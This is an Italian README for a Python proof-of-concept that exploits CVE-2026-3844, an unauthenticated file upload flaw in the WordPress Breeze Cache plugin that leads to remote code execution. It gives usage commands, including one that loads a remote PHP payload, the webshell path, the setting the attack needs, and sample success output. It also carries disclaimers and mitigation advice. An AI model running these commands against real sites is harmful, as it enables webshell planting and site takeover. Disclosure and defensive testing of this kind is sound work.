
Proof-of-concept in Python per CVE-2026-3844, un upload arbitrario di file non autenticato nel plugin WordPress Breeze Cache, che consente l'esecuzione remota di codice. Include rilevamento, sfruttamento e verifica della webshell.
Questo repository contiene uno script proof-of-concept (PoC) in Python per dimostrare una vulnerabilità di Upload File Arbitrario Non Autenticato che interessa il plugin WordPress Breeze Cache <= 2.4.4.
⚠️ Questo progetto è destinato esclusivamente a test di sicurezza autorizzati, ricerca educativa e validazione difensiva.
La vulnerabilità sfrutta la funzionalità di caching dei gravatar di Breeze Cache per memorizzare file controllati dall'attaccante all'interno della directory di cache di WordPress.
pycurltermcolorInstalla le dipendenze:
pip install pycurl termcolor
| File | Descrizione |
|---|---|
CVE-2026-3844.py | Script PoC principale |
CVE-2026-3844.yaml | Template/configurazione YAML |
python3 CVE-2026-3844.py -u http://target.com --check-only
python3 CVE-2026-3844.py -u http://target.com
python3 CVE-2026-3844.py -u http://target.com -p https://example.com/payload.php
python3 CVE-2026-3844.py -u http://target.com -o results.txt
Lo script esegue i seguenti passaggi:
Il payload caricato potrebbe diventare accessibile da:
/wp-content/cache/breeze-extra/gravatars/
Il successo dello sfruttamento potrebbe dipendere dalla seguente impostazione di Breeze abilitata:
Host Files Locally - Gravatars
Se la funzionalità è disabilitata, i tentativi di sfruttamento potrebbero fallire.
[+] Target VULNERABLE (Breeze v2.4.4)
[+] Comment posted successfully
[+] File found at: http://target.com/wp-content/cache/breeze-extra/gravatars/random.php
[+] VERIFICATION STRING FOUND - EXPLOIT SUCCESSFUL!
Questo repository è fornito per:
Non utilizzare questo progetto contro sistemi che non possiedi o per i quali non hai esplicito permesso di testare.
L'autore non si assume alcuna responsabilità per usi impropri o danni causati da questo progetto.
Gli amministratori di siti web dovrebbero:
/wp-content/cache/ per file sospettiQuesto proof-of-concept è stato creato per aiutare:
a comprendere i rischi per la sicurezza associati a meccanismi di caching non sicuri e upload di file arbitrari.
Progetto di Ricerca sulla Sicurezza / Educativo